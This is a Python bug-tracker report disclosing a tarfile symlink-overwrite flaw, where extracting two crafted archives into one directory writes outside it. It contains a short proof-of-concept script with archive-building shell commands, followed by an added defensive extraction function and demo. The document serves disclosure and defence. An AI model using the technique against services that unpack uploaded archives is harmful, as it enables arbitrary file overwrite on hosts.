Author leveryd
Recipients leveryd
Date 2021-05-03.17:44:03
Message-id <1620063843.8.0.514260137969.issue44023@roundup.psfhosted.org>
In-reply-to
Content
If a file is uncompressed twice to the same dir, an attacker can "write any content to any file on the host".

PoC code like below:
```
import tarfile


dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a


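def vuln_tar(tar_path):
    """
    Extract every member of the archive into dir_name with no checks.

    :param tar_path: path of the tar archive to extract
    :return: None
    """
    tar = tarfile.open(tar_path, "r:tar")
    file_names = tar.getnames()
    for file_name in file_names:
        # No check on member type or on what already exists at the target path.
        tar.extract(file_name, dir_name)
    tar.close()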


vuln_tar(file1_name)
vuln_tar(file2_name)
```

In this PoC code, if a service uncompresses a tar file which is uploaded by an attacker to "dir_name" twice, the attacker can create "/tmp/a" and write the string "it is just poc" into the "/tmp/a" file.
History
Date User Action Args
2021-05-03 17:44:03 leveryd set recipients: + leveryd
2021-05-03 17:44:03 leveryd set messageid: <1620063843.8.0.514260137969.issue44023@roundup.psfhosted.org>
2021-05-03 17:44:03 leveryd link issue44023 messages
2021-05-03 17:44:03 leveryd create
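
An added example, not part of the original report and not CPython's own code: one way a service could guard the double extraction described in the message, by refusing link members and any member whose path resolves outside the destination through a symlink already on disk. `safe_extract`, `demo` and the temporary paths (with `outside_a` standing in for `/tmp/a`) are assumptions made for illustration, and both archives are constructed inline.

```python
import io
import os
import tarfile
import tempfile


def safe_extract(tar_path, dest):
    """Extract into dest; refuse link members and paths that resolve outside dest."""
    dest_real = os.path.realpath(dest)
    # Second layer: the stdlib "data" extraction filter, where this Python has it.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(tar_path, "r:*") as tar:
        for member in tar.getmembers():
            if member.issym() or member.islnk():
                raise ValueError(f"link member refused: {member.name}")
            # realpath() also follows symlinks already on disk from an earlier archive.
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"{member.name} resolves to {target}")
            tar.extract(member, dest_real, **extra)


def demo():
    """Constructed input mirroring the report; returns (a_refused, b_refused, outside_written)."""
    results = []
    with tempfile.TemporaryDirectory() as work:
        outside = os.path.join(work, "outside_a")  # stands in for /tmp/a
        dest = os.path.join(work, "dest")
        os.makedirs(os.path.join(dest, "test_tar"))
        link = tarfile.TarInfo("test_tar/a")  # first archive: symlink member
        link.type, link.linkname = tarfile.SYMTYPE, outside
        payload = b"it is just poc\n"
        regular = tarfile.TarInfo("test_tar/a")  # second archive: regular file, same name
        regular.size = len(payload)
        for name, info, data in (("a.tar", link, None), ("b.tar", regular, payload)):
            path = os.path.join(work, name)
            with tarfile.open(path, "w") as tar:
                tar.addfile(info, io.BytesIO(data) if data else None)
            if name == "b.tar":  # the link an unchecked first extraction would leave behind
                os.symlink(outside, os.path.join(dest, "test_tar", "a"))
            try:
                safe_extract(path, dest)
                results.append(False)
            except ValueError:
                results.append(True)
        return results[0], results[1], os.path.exists(outside)
```

The second check is the one that matters for this report: the second archive contains only a regular file, so it is refused solely because the path it would be written to already resolves outside the destination.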